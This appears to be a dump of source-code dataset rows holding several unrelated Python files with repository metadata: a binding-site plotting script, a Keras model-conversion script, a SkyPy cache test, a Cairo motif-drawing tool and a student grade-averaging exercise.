#h = hist(array(dists), sqrt(len(dists)), weights=posts) #, bins=linspace(-100,100,sqrt(len(dists)))
binnum = int(sqrt(min(sum(posts),len(posts))))
binrange = linspace(-100,100,max(2,binnum))
h = hist(array(dists), bins=binrange, weights=posts) #, bins=linspace(-100,100,sqrt(len(dists)))
close()
#shuffled_h = hist(array(shuffled_dists), sqrt(len(shuffled_dists)), weights=shuffled_posts)
shuffled_h = hist(array(shuffled_dists), bins=binrange, weights=shuffled_posts)
close()
figure()
hbase = [mean([h[1][i], h[1][i+1]]) for i in arange(len(h[1])-1)]
plot(hbase, h[0]/float(len(peakDict)), label='real sites')
shuffled_hbase = [mean([shuffled_h[1][i], shuffled_h[1][i+1]]) for i in arange(len(shuffled_h[1])-1)]
plot(shuffled_hbase, shuffled_h[0]/float(len(peakDict)*sample_size), label='shuffled sites') #times sample_size because I shuffled that many times per peak
xlabel('TFBS - peakcenter offset')
ylabel('Probability of having a TFBS at offset')
xlim([-100,100])
legend()
savefig(histplot)
savefig(histplot.rstrip('.pdf'))
close()
figure()
plot(dists, posts, '.')
savefig(scatterplot)
close()
def plotStats(peakstats, plotlist, minpost):
# plotlist = [height_post_scatter, quality_post_scatter, height_post_violin, quality_post_violin, post_hist, post_cumulative]
a = loadtxt(peakstats, usecols = [4,5,6], skiprows=1) #4: zscore, 5: quality, 6: peak posterior
peakzscores = a.T[0]
peakquals = a.T[1]
peakposts = a.T[2]
##plot height post scatter and also compute PCA
#compute PCA to get correlation between peak posterior and peak height
# eigvals, eigvecs = eig(cov(peakzscores, peakposts))
# fov1 = max(eigvals)/sum(eigvals)
# ind = argmax(eigvals)
# baseslope = eigvecs[:,ind][1] / eigvecs[:,ind][0]
# #also compute FOV for shuffled vectors to get a feeling for what this number means
# aheights = array(peakzscores)
# aposts = array(peakposts)
# shuffle(aheights)
# shuffle(aposts)
# aeigvals, aeigvecs = eig(cov(aheights, aposts))
# afov1 = max(aeigvals)/sum(aeigvals)
# scalefac = mean([max(peakzscores), max(peakposts)])
# Compute FOV of first principal component of the variance normalized covariance matrix.
# normalized cov-matrix: [[var1/(sig1*sig1), cov/(sig1*sig2)],[cov/(sig1*sig2), var2/(sig2*sig2)]], which results in: [[1, cov/(sig1*sig2)], [cov/(sig1*sig2), 1]]
# solving the characteristic polynomial yields: (1-lambda)**2 = (cov/sig1*sig2)**2 and then lambda = 1 +- sqrt(cov**2/(var1*var2))
# Thus FOV = (1 + sqrt(cov**2/(var1*var2)) )/2
covmat = cov(peakzscores, peakposts)
r_mat = corrcoef(peakzscores, peakposts)
#fov1 = (1 + sqrt( (covmat[0][1]**2)/(covmat[0][0] * covmat[1][1]) ))/2
print r_mat, covmat
pearson_r = r_mat[0][1]
fov1 = pearson_r
global shit
shit = False
if isnan(pearson_r):
shit = True
#make box plots of posterior distributions stratified by height
make_boxplot(peakzscores, peakposts, 20, plotlist[2], 'ChIP-Signal (Z-score)', 'Number of Binding Sites', plabel = 'Correlation: %s' %round(fov1,4) )
make_boxplot(log10(array(peakquals)), peakposts, 40, plotlist[3], 'log10(peak quality (RMSD))', 'number of binding sites')
figure()
plot(peakzscores, peakposts, '.', rasterized=True)
#plot([0, eigvecs[:,ind][0] * scalefac], [0,eigvecs[:,ind][1] *scalefac], label='slope = %s' %baseslope)
xlabel('peak Z-score')
ylabel('number of binding sites')
savefig(plotlist[0])
close()
figure()
plot(log10(array(peakquals)), peakposts, '.', rasterized=True)
xlabel('log10(peak quality (RMSD))')
ylabel('peak posterior')
savefig(plotlist[1])
close()
figure()
hist(peakposts, sqrt(len(peakposts))) #100)
xlabel('number of binding sites')
ylabel('number of peaks')
savefig(plotlist[4])
close()
figure()
plot(sorted(peakposts), arange(1,len(peakposts)+1,1))
plot([minpost, minpost], [1, len(peakposts)], label= 'number of binding site cut-off')
xscale('log')
yscale('log')
xlabel('number of binding sites')
ylabel('number of peaks with up to number of binding sites')
legend(loc='lower right')
savefig(plotlist[5])
close()
return fov1
def computeExpectedCoverage(TFBSstats, plotfile, covs_list):
"""
-This function plots a violin plot of TFBS posterior versus coverage at that position
-Secondly it computes:
sum(c(i)*w(i)) / ( sum(w(i)) * mean(c) )
This is a measure for how centered to the peaks TFBSs are.
"""
# make histograms of coverage frequencies at sites and in total.
a = loadtxt(TFBSstats, usecols=[5,6], skiprows=1) #5: posterior, 6: coverage
try:
posts = a.T[0]
TFBScovs = a.T[1]
except IndexError:
posts = array([1])
TFBScovs = array([1])
make_boxplot(TFBScovs, posts, 20, plotfile, 'coverage/height at TFBS', 'posterior of TFBS')
expcov = sum(posts*TFBScovs)/(sum(posts) * mean(covs_list)) #mean(TFBScovs))
return expcov
def execute(cf):
"""
This component gives true regions (determined by a posterior cut-off on TFBS).
It produces some plots:
-histogram of region posteriors (one with summed posteriors and one with maximum TFBS posterior per region)
-plots peak coverage (from RegionCoverage) plots with TFBSs (above 0.5 posterior cut-off)
"""
##Ports and parameters
peakstats = cf.get_input("peakstats")
TFBSstats = cf.get_input("TFBSstats")
regcov_dir = cf.get_input("RegCov_dir")
log_file = cf.get_output("log_file")
#plots:
TFBS_peakcenter_dist_hist = cf.get_output("TFBS_peakcenter_dist_hist")
TFBS_post_peakcenter_dist_scatter = cf.get_output("TFBS_post_peakcenter_dist_scatter")
zscore_post_scatter = cf.get_output("zscore_post_scatter")
quality_post_scatter = cf.get_output("quality_post_scatter")
zscore_post_violin = cf.get_output("zscore_post_violin")
quality_post_violin = cf.get_output("quality_post_violin")
TFBSheight_TFBSpost_scatter = cf.get_output("TFBSheight_TFBSpost_scatter")
post_hist = cf.get_output("post_hist")
post_cumulative = cf.get_output("post_cumulative")
cov_hists = cf.get_output("coverage_histograms")
plotlist = [zscore_post_scatter, quality_post_scatter, zscore_post_violin,
quality_post_violin, post_hist, post_cumulative]
minpost = cf.get_parameter("minposterior", "float")
T1 = datetime.datetime.now()
# read in region coverage: one dictionary regionid: start-stop and one list with all coverages
covs_list = []
region_dict = {}
for regcov in os.listdir(regcov_dir):
#chr1 120313250 120313750 reg1013598 1 3.5
regcov_file = os.path.join(regcov_dir, regcov)
a = loadtxt(regcov_file, usecols=[5])
covs_list += list(a)
with open(regcov_file) as f:
l = f.readline().strip().split()
region_dict[l[3]] = [int(l[1]), int(l[2])]
plotTFBSdist(peakstats, TFBSstats, region_dict, minpost, TFBS_peakcenter_dist_hist, TFBS_post_peakcenter_dist_scatter)
fov1 = plotStats(peakstats, plotlist, minpost)
expcov = computeExpectedCoverage(TFBSstats, TFBSheight_TFBSpost_scatter, covs_list)
# plot coverage histograms (coverage at sites and coverage everywhere)
#hr = hist(covs_list, sqrt(len(covs_list)), histtype='step', normed=True, label='region coverage')
site_covs = loadtxt(TFBSstats, usecols=[6], skiprows=1)
site_posts = loadtxt(TFBSstats, usecols=[5], skiprows=1)
binnum = int(sqrt(min(sum(site_posts), len(site_posts))))
bin_range = linspace(min(covs_list), max(covs_list), max(binnum,2))
if not shit:
hr = hist(covs_list, bin_range)
hs = hist(site_covs, bin_range, weights=site_posts)
close()
figure()
hrbase = [mean([hr[1][i], hr[1][i+1]]) for i in arange(len(hr[1])-1)]
plot(log(hrbase), log(hr[0]/float(len(covs_list))), label='region coverage')
hsbase = [mean([hs[1][i], hs[1][i+1]]) for i in arange(len(hs[1])-1)]
#plot(log(hsbase), log(hs[0]/float(len(site_covs))), label='site coverage')
plot(log(hsbase), log(hs[0]/sum(site_posts)), label='site coverage')
else:
figure()
title('Enrichment at Binding Sites: %s' %round(expcov,4))
xlabel('log(Coverage)')
ylabel('log(Frequency)')
legend()
savefig(cov_hists)
savefig(cov_hists.rstrip('.pdf'))
close()
#count how many peaks have peak posterior above minpost
posts = loadtxt(peakstats, usecols=[6], skiprows=1) #load summed posts
totalnum = len(posts)
truenum = len(where(posts>= minpost)[0])
falsenum = totalnum - truenum
T2 = datetime.datetime.now()
text = '\n'.join(['Overall statistics:',
'\t- Number of true peaks out of total number of peaks: %i/%i' %(truenum, totalnum),
'\t- %.2f percent are true.' %(100*float(truenum)/totalnum),
'\t- Cut-off: minimum summed posterior of %.2f' %minpost,
'\t- Peak plots contain TFBS of posterior >= %.2f' %minpost,
'Statistic for centering of TFBSs at peak centers:',
'\t- Enrichment at binding sites: %s' %round(expcov,4),
'Correlation between peak Z-score and number of binding sites at peak: %s' %round(fov1,4)
])
timetext = '\n'.join(['Running time:',
'\t- Overall: %s' %(T2-T1)
])
lf = open(log_file, 'w')
lf.write(text + '\n')
#lf.write(timetext)
lf.close()
return 0
component_skeleton.main.main(execute)
| [
"severin.berger@stud.unibas.ch"
] | severin.berger@stud.unibas.ch | |
2d3fe35ed9b89a8c34620b3e95d655218a412919 | a46a0a638d18906ecef55352deb5b8697dedf971 | /src/convert_model.py | 14ccc03afbe6d7d1dc184eebc3b7ba1a7ee5f83e | [
"MIT"
] | permissive | skyimager/stanford_cars_classification | eafd2cc8730628e3332568e9db29575c8416f75a | 812e34c66ac37d164545980676ba2d89fe751b0c | refs/heads/master | 2020-06-05T07:07:16.399148 | 2019-06-18T16:17:52 | 2019-06-18T16:17:52 | 192,354,175 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,761 | py | #!/usr/bin/env python
"""
Copyright 2017-2018 Fizyr (https://fizyr.com)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import os
import sys
import keras
import tensorflow as tf
# Change these to absolute imports if you copy this script outside the keras_retinanet package.
from src import networks
from src.utils.config import read_config_file, parse_anchor_parameters
def get_session():
""" Construct a modified tf session.
"""
config = tf.ConfigProto()
os.environ["CUDA_VISIBLE_DEVICES"] = ""
return tf.Session(config=config)
def parse_args(args):
parser = argparse.ArgumentParser(description='Script for converting a training model to an inference model.')
parser.add_argument('model_in', help='The model to convert.')
parser.add_argument('model_out', help='Path to save the converted model to.')
parser.add_argument('--backbone', help='The backbone of the model to convert.', default='resnet50')
parser.add_argument('--no-nms', help='Disables non maximum suppression.', dest='nms', action='store_false')
parser.add_argument('--no-class-specific-filter', help='Disables class specific filtering.', dest='class_specific_filter', action='store_false')
parser.add_argument('--config', help='Path to a configuration parameters .ini file.')
return parser.parse_args(args)
def main(args=None):
# parse arguments
if args is None:
args = sys.argv[1:]
args = parse_args(args)
# Set modified tf session to avoid using the GPUs
keras.backend.tensorflow_backend.set_session(get_session())
# optionally load config parameters
anchor_parameters = None
if args.config:
args.config = read_config_file(args.config)
if 'anchor_parameters' in args.config:
anchor_parameters = parse_anchor_parameters(args.config)
# load the model
model = models.load_model(args.model_in, backbone_name=args.backbone)
# check if this is indeed a training model
models.check_training_model(model)
# convert the model
model = models.convert_model(model, nms=args.nms, class_specific_filter=args.class_specific_filter, anchor_params=anchor_parameters)
# save model
model.save(args.model_out)
if __name__ == '__main__':
main()
| [
"pradip.gupta@ril.com"
] | pradip.gupta@ril.com |
c9f1be0d07eed045b23653c1e106ba1532553bf3 | 95f6c4f2edd55add55adfa02cb37ab6ff1cb5af9 | /channels/telegram/__init__.py | 17b2efded395916641c6fa7ef4e80cf2fa0cb71f | [
"LicenseRef-scancode-other-permissive"
] | permissive | SeedVault/rhizome | de5832bb29e792c711b57070f0d7ab109fb59875 | b94ef5e75411ac4a214f5ac54d04ce00d9108ec0 | refs/heads/master | 2022-12-10T19:10:35.581534 | 2020-02-22T02:06:30 | 2020-02-22T02:06:30 | 145,477,664 | 8 | 3 | NOASSERTION | 2022-12-08T03:14:00 | 2018-08-20T22:42:16 | Python | UTF-8 | Python | false | false | 33 | py | """Package channels.telegram."""
| [
"nicolas@botanic.io"
] | nicolas@botanic.io |
98c511760929dd8c5b0092cd5560908bb71b0144 | 0276a4b8b92da8aa167e222391bf2d8370ef7022 | /Motif_mark.py | 8362aeb3a6ad3c44c08806c6cf63c382eadb54c9 | [] | no_license | alexadowdell/motif-mark | ab7fb69424390b2b5eb909ce187f35778a302bf3 | ad5acc63d3a8e78968f61da8aad3f9efe4aa38ee | refs/heads/master | 2021-04-09T16:01:06.919763 | 2018-03-20T04:48:14 | 2018-03-20T04:48:14 | 125,677,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,246 | py | #!/usr/bin/python3
#from IPython.core.display import SVG, display
import argparse
import cairo
import random
#####################################################################################################################
############################################ Set up Argparse ########################################################
#####################################################################################################################
parser = argparse.ArgumentParser(description="Motif Marker: Identifies and counts motif sequences that appear in gene sequences from a FASTA file and constructs an image of the motif locations in relation to intron/exons.")
parser.add_argument("-f", "--file", help="Required parameter. Please pass a FASTA file with gene names in the sequence ID and exons CAPITALIZED", required=True, type=str)
parser.add_argument("-m", "--motif", help="Require parameter. Please pass of text file of motifs (one per line) to be used to look for. Motifs must use IUPAC nucleotide code format", required=True, type=str)
args = parser.parse_args() #sets arguments as call-able
f = args.file
m = args.motif
#f = "./sequences.fasta"
#m = "./motifs.txt"
#####################################################################################################################
############################################ Define main functions ##################################################
#####################################################################################################################
#Initiate and construct a dictionary with all IUPAC nucleotide codes to bases. Keys = nucleotide code, Value = Bases
iupac_dict = {"A": "[Aa]", "C":"[Cc]", "G":"[Gg]", "T":"[TtUu]","U":"[UuTt]", "R": "[AaGg]", "Y":"[TtCcUu]",
"S":"[CcGg]", "W":"[AaTtUu]","K":"[GgTtUu]", "M":"[AaCc]", "B":"[CcGgTtUu]", "D":"[AaGgTtUu]",
"H":"[AaCcTtUu]", "V":"[AaCcGg]", "N":"[AaTtCcGgUu]", "a": "[Aa]", "c":"[Cc]", "g":"[Gg]",
"t":"[TtUu]","u":"[UuTt]", "r": "[AaGg]", "y":"[TtCcUu]", "s":"[CcGg]", "w":"[AaTtUu]","k":"[GgTtUu]",
"m":"[AaCc]", "b":"[CcGgTtUu]", "d":"[AaGgTtUu]", "h":"[AaCcTtUu]", "v":"[AaCcGg]", "n":"[AaTtCcGgUu]"}
def split_sequence(sequence):
'''Parses fasta sequence and splits up a sequence in the form of 'preintronEXONpostintron', into seperated
items in a list [intron_1, exon, intron_2] '''
intron_1 = ""
intron_2 = ""
exon = ""
exon_identified = False
for char in sequence:
if (char.islower() == False): # If lowercase letters stop being found, the exon was located.
exon += char #Exon identified
exon_identified = True
elif (exon_identified == False): #If the exon was not identified yet, the
intron_1 = intron_1 + char
else:
intron_2 = intron_2 + char
return [intron_1, exon, intron_2]
def fasta_conversion(fastaFile):
''' Takes in a fasta file. Construct a dictionary parsing the fasta with the key being the sequence header
and the value being the full sequence in one string. Returns a fasta dictionary with entries in the form
{Header:Sequence}'''
with open(fastaFile) as fh:
fastaDict = {}
header = ""
sequence = ""
firstLine = True
for line in fh:
line = line.strip()
if line[0] == ">": #if the line starts with a '>' its a header
if (firstLine != True): #
fastaDict[header] = split_sequence(sequence) #for all additional lines,
header = line #if first line is true, set the header line
sequence = "" #still first line, initialize the sequence
else:
sequence += line
firstLine = False
fastaDict[header] = split_sequence(sequence) #special case
return fastaDict
def parse_motifs(motifFile):
'''Takes in a text file of motifs and creates a list of the motifs. For each motif, each nucleotide code is
evaluated and the corresponding IUPAC bases are associated with it. Dictionary is returned key=motif, value=list
of sets of bases corresponding to each character in the motif.'''
motifList = []
motifDict = {}
with open(motifFile) as fh:
for line in fh:
motifList.append(line.strip()) #Create a list of all motifs in file
for motif in motifList: #for each motif in list
regex = []
for char in motif: #look at each nucleotide individually
regex.append(iupac_dict[char]) #finding corresponding base codes and return them as the value in the dictionary
motifDict[motif] = regex #Dictionary: key=motif, value=list associated base combinations
return motifDict
def extract_motif_pos(header, sequence, motifDict):
'''Takes in a motif header, associated sequence and motif dictionary. Walks through a sequence looking for instances
of the associated motif by referencing the possible combinations of bases given the IUPAC nucleotide codes. Returns
a list of positions the motif was found at in the sequence'''
positionList = {} #Initialize a dictionary of motif positions
for motif in motifDict.keys(): #For each motif in the dictionary
motif_codes = motifDict[motif] #set the motif's associated regex nucleotide codes to a variable.
frame = len(motif)
for i in range(0,len(sequence) - frame):
current_frame = sequence[i:i + frame] #all possible frames across the sequence the length of the motif, as bases
counter = 0
motif_match = True
for base in current_frame:
if base not in motif_codes[counter]:#if base does not match one in the possible motif codes
motif_match = False
counter += 1
if (motif_match == True): #if motif match is found
if header + "_" + motif in positionList:
positionList[header + "_" + motif].append(i) #extract the position and add it to the value of that header_motif in list form
else:
positionList[header + "_" + motif] = [i] #if the motif was not found yet, add it as a new entry to the dictionary,
#value is a new initialized list with the position
return positionList
def identify_all_motifs(fastaFile, motifFile):
'''Takes in a fasta file and a motif text file. Returns a positions list containing motifs and the occurences of those motifs
for each fasta sequence, as well as the locations of the pre-intron, exon, and post-intron.'''
fastaDict = fasta_conversion(fastaFile) #Create fasta dictionary {header:sequence}
motifDict = parse_motifs(motifFile) #Create dictionary of motifs {motif:nucleotide code combinations in IUPAC format for the motif}
positionList = []
for entry in fastaDict.items():
sequence = "".join(fastaDict[entry[0]])
header = entry[0]
content = extract_motif_pos(header, sequence, motifDict) #extract all positions of motifs
content["intron_1"] = len(fastaDict[entry[0]][0]) #extract all positions of pre-introns
content["exon"] = len(fastaDict[entry[0]][1]) #extract all positions of exons
content["intron_2"] = len(fastaDict[entry[0]][2]) #extract all positions of post-introns
positionList.append(content) #Create one global position list containing all motif positions, pre-introns, exons,
# and post-introns for each sequence passed in.
return positionList
#####################################################################################################################
######################################## Define plotting functions ##################################################
#####################################################################################################################
def add_gene_name(start_pos, gene):
'''Add gene name to the left of gene drawn in black'''
context.set_source_rgb(0.4,0.4,0.4)
context.move_to(start_pos[0] - 100, start_pos[1]) #defines location of gene name placement
context.show_text(gene) #prints gene name
def add_labels(r, g, b, alpha, start_pos, adjustment, motif):
'''Add motif names in the random colors the markers were generated in'''
context.set_source_rgba(r, g, b, alpha)
context.move_to(start_pos[0] - 57, start_pos[1] + adjustment) #adjust motif label placement
context.show_text(motif) #prints motif name
def draw_gene(intron_1 , intron_2, exon_len, context, start_pos):
'''Draw the gene in grey/black intron, exon, intron, with the exon being a wider width rectangle'''
context.set_line_width(1)
context.set_source_rgb(0.4,0.4,0.4) #grey/black
context.move_to(start_pos[0], start_pos[1])
context.line_to(start_pos[0] + intron_1 + exon_len + intron_2, start_pos[1])
context.stroke()
context.set_line_width(10)
context.move_to(start_pos[0] + intron_1, start_pos[1])
context.line_to(start_pos[0] + intron_1 + exon_len, start_pos[1])
context.stroke()
def draw_motifs(positionList, context, start_pos, motif):
'''Draw markers at the position each motif was found in the sequence. Randomly generated
color corresponding to gene labels'''
r = random.random()
g = random.random()
b = random.random()
alpha = random.uniform(0.7, 1.0)
context.set_line_width(10)
context.set_source_rgba(r, g, b, alpha)
for position in positionList:
context.move_to(start_pos[0] + position, start_pos[1])
context.line_to(start_pos[0] + position + len(motif), start_pos[1])
context.stroke()
context.move_to(start_pos[0] + position, start_pos[1] - 20)
context.show_text(str(position))
return [r, g, b, alpha]
#####################################################################################################################
################################################ Main code ##########################################################
#####################################################################################################################
#Main command, finds all motif positions, intron, and exon positions
global_positions = identify_all_motifs(f, m)
#Construct a drawing surface and identify a start position
surface = cairo.SVGSurface("motif_plot.svg", 1500, 800)
context = cairo.Context(surface)
context.set_line_width(10)
start_pos = [200,150]
for entry in global_positions:
draw_gene(entry["intron_1"],entry["intron_2"],entry["exon"], context, start_pos)
adjustment = -10
for item in entry.items():
if item[0][0] == ">":
motif = item[0].split("_")
motif = motif[1]
gene = item[0].split(" ")
gene = gene[0][1:]
color = draw_motifs(item[1], context, start_pos, motif)
add_gene_name(start_pos, gene)
add_labels(color[0], color[1], color[2], color[3], start_pos, adjustment, motif)
adjustment = adjustment + 10
start_pos = [start_pos[0], start_pos[1] + 100]
#display(SVG('example.svg'))
| [
"adowdell@uoregon.edu"
] | adowdell@uoregon.edu |
cf63b4a0764db2a24c7a3992b08ae676ec0ea0fd | d81251967de1a26ef9dd815e17b1fed89f4f63b5 | /lib/logic.py | a24db40b294f4f76a1d043712b0d741b2977a141 | [
"MIT"
] | permissive | dhavalshiyani/Variable_calculator | 3a29f9d0d3c7fb1b2131ceb919cad53dc806a9f5 | 936895eb9463a7bd6a1a8d5aa391cb6531490c77 | refs/heads/master | 2020-03-21T07:04:36.910267 | 2018-06-22T06:21:13 | 2018-06-22T06:21:13 | 138,259,132 | 0 | 0 | MIT | 2018-06-22T05:56:50 | 2018-06-22T05:37:37 | null | UTF-8 | Python | false | false | 4,332 | py | import sys
import os
import commands
import math
#from tabulate import tabulate
import linecache
import configinfo
mu,Cmu = configinfo.constants()
def turbcalc(mu, Cmu):
#User-input
try:
calcType = raw_input('\n'"Calculate boundary layer(\"del\") or inlet length(\"len\"): ")
type_of_solver = raw_input("SolverType boundary layer based \"blb\" or Mixing length based \"mlb\": ")
#flow_type = raw_input("laminar \"l\" or turbulent \"t\": ")
velc = float(input('\n'"Enter freestream velocity: "))
input_turbint = float(input("Enter turbulent intensity(%): "))
except ValueError:
PrintException()
print'Match the words within \'\''
sys.exit(1)
#Basic_Calculations
turbint = input_turbint*0.01
k = (1.5*((velc*turbint)**2))
#Case_Dependent Calculations:
if calcType == 'del':
ref_l = float(input("Enter reference length: "))
Re = float((velc*ref_l)/mu)
if Re < 2300:
delta = 4.91*ref_l/(Re**(1.0/5.0))
else:
delta = 0.382*ref_l/(Re**(1.0/5.0))
if calcType == 'len': #Fix this Re calculated before knowing the value
delta = float(input("Enter boundary layer thickness: "))
if Re < 2300:
ref_l = (delta*(Re**(1.0/5.0)))/4.91
else:
ref_l = (delta*(Re**(1.0/5.0)))/0.382
Re = float((velc*ref_l)/mu)
if type_of_solver == 'blb':
l = (0.22*delta)
epsilon = (Cmu*((k**1.5)/l))
omega = ((math.sqrt(k))/l)
if type_of_solver == 'mlb':
l = (0.4*delta)
epsilon = ((Cmu**(3.0/4.0))*((k**1.5)/l))
omega = ((Cmu**(-1.0/4.0))*((math.sqrt(k))/l))
#Output
print '\n''Output:'
print '--------------------------------------'
if Re > 2300:
print 'Flow is TURBULENT'
else:
print 'Flow is LAMINAR'
print '\n''Re:', round(Re, 4)
print 'Boundary layer thickness:', round(delta, 6), ' m'
print 'Mixing length(l):', round(l, 4)
print '\n''k:', round(k, 6)
print 'Epsilon:', round(epsilon, 6)
print 'Omega:', round(omega, 6)
print '--------------------------------------''\n'
return(Re, k, epsilon,omega, delta)
def timecalc():
#User-input
l = float(input('\n'"Enter length of the edge (m): "))
n = float(input("Enter number of divisions (n): "))
R = float(input("Enter bias factor (R): "))
velc = float(input("Enter freestream velocity (m/s): "))
#Small r calc:
try:
r = R**(1.0/(n-1.0))
except ZeroDivisionError, e:
#Simpler way to throw exception without details #z = e
#print '\n', z, '\n''Number of divisions (n) cannot be 1'
PrintException()
print 'Number of divisions cannot be 1''\n'
sys.exit(1)
#Grading dependent calculations:
if R > 1.0:
alpha = R
#Smallest Cell size calculation:
deltax_s = (l*(r-1))/((alpha*r)-1)
if R < 1.0:
alpha = (1.0-(r**(-n))+(r**(-1.0)))
#Smallest Cell size calculation:
deltax_s = (l*(r-1))/((alpha*r)-1)
if R == 1.0:
print '\n'"No Biasing found"
deltax_s = l/n
#Time-step calc
delta_t = (1.0*deltax_s)/velc
#Output:
print '\n''Output:'
print '-----------------------------------------'
print "Time-step should be <= ",delta_t
print "Smallest cell size = ",deltax_s
print '-----------------------------------------'
print '\n'
return
def rossitercalc():
#create list of output
L_Frequencies = []
L_keys = []
#constants
alpha = 0.25
k = 0.57
a = 343.54
gamma = 1.4
#User-input
m = int(input('\n'"Enter the number of modes: "))
L = float(input("Enter the length of cavity (m): "))
Uinf = float(input("Enter freestream velocity (m/s): "))
#Common terms calculated once (time savers):
Minf = Uinf/a
#print '\n'"M: ", Minf
outside_multiplier = Uinf/L
#print 'outside_multiplier: ', outside_multiplier
gamma_term = (gamma-1)/2
#print '\n', gamma_term
denominator = ((Minf/math.sqrt(1+gamma_term*Minf))+(1/k))
#print '\n'"Denominator: ", denominator
print '\n'
print 'Rossiter Frequencies'
print '--------------------'
for i in range(1, m+1):
fi = outside_multiplier*(i-alpha)/denominator
print 'f%d = %f Hz' %(i, fi)
L_Frequencies.append(fi)
L_keys.append("f_%d" %(i))
print '--------------------'
print '\n'
#Table format from tabulate ignored for now
#print L_keys
#print L_Frequencies
return | [
"noreply@github.com"
] | dhavalshiyani.noreply@github.com |
4d57700a00166a0ef228e6730a98bd44d84c7b14 | 6e5b10e1b204b1ae7f4c7270f010e3b8db8fc185 | /src/python/skypy/soft_cache_test.py | 35c73f368b8f48f29c894fa54ba3f7ed9b909bdc | [
"ISC",
"LicenseRef-scancode-other-permissive"
] | permissive | ms705/ciel | 9c04e8cb4f62464de46f98997f85fd37f8a13933 | 0e7045984161dfa104fd3c8296439e03321109c9 | refs/heads/master | 2021-01-17T21:39:12.931308 | 2011-06-20T14:46:04 | 2011-06-20T14:46:04 | 1,416,212 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,229 | py |
from __future__ import with_statement
import skypy
import soft_cache
def counter(ref):
cached_result = soft_cache.try_get_cache([ref], "wc")
if cached_result is not None:
print "Counter: got cached result! It was", cached_result
else:
with skypy.deref_as_raw_file(ref, make_sweetheart=True) as in_fp:
cached_result = len(in_fp.read())
print "Counter: calculated result anew. It was", cached_result
soft_cache.put_cache([ref], "wc", cached_result)
return cached_result
def skypy_main():
new_output_index = skypy.get_fresh_output_index()
out_fp = skypy.open_output(new_output_index)
with out_fp:
for i in range(100000):
out_fp.write("Whoozit")
out_ref = out_fp.get_completed_ref()
first_counter = skypy.spawn(counter, out_ref, extra_dependencies=[out_ref])
second_counter = skypy.spawn(counter, out_ref, extra_dependencies=[out_ref])
with skypy.RequiredRefs([first_counter, second_counter]):
first_result = skypy.deref(first_counter)
second_result = skypy.deref(second_counter)
return "First counter said", first_result, "and second one said", second_result
| [
"cs448@cam.ac.uk"
] | cs448@cam.ac.uk |
c61978a01142cd65fa4c4179394a7d9216b3351e | b3b0f9755153a3aa710ff1bb58c3cbac50e21d65 | /Aula06/Exercício3.py | e54af58594e42a92fe8ba78647d81262fe069f2f | [] | no_license | NicoleGruber/AulasPython | ac36d505ae814792f3311139b673bc89be45c8a8 | 94a6c91c3d83314f711003eb3fd4ff452102dd49 | refs/heads/master | 2021-07-10T05:04:49.221712 | 2020-02-25T01:35:35 | 2020-02-25T01:35:35 | 234,075,283 | 0 | 0 | null | 2021-03-20T03:00:53 | 2020-01-15T12:24:32 | Python | UTF-8 | Python | false | false | 794 | py | #---- Exercício 3 - Foreach
#---- Escreva programa que leia as notas (4) de 10 aluno
#---- Armazene as notas e os numes em listas
#---- Imprima:
# 1- O nome dos alunos
# 2- Média do aluno
# 3- Resultado (Aprovado>=7.0)
n1=0
n2=1
n3=2
n4=3
ListaAlunos = []
ListaNotas = []
for i in range(0,1) :
ListaAlunos.append(input(f'Digite o nome do aluno {i+1}: '))
for n in range(0,4):
ListaNotas.append(float(input(f'Digite a nota {n+1}: ')))
for aluno in ListaAlunos:
media=(ListaNotas[n1]+ListaNotas[n2]+ListaNotas[n3] + ListaNotas[n4])/4
print(f'Aluno: {aluno} - resultado: ')
print(f'Média: {media}')
if media>= 7:
print('Aprovado!')
else:
print('Reprovado!')
n1 += 4
n2 += 4
n3 += 4
n4 += 4
| [
"57449553+NicoleGruber@users.noreply.github.com"
] | 57449553+NicoleGruber@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.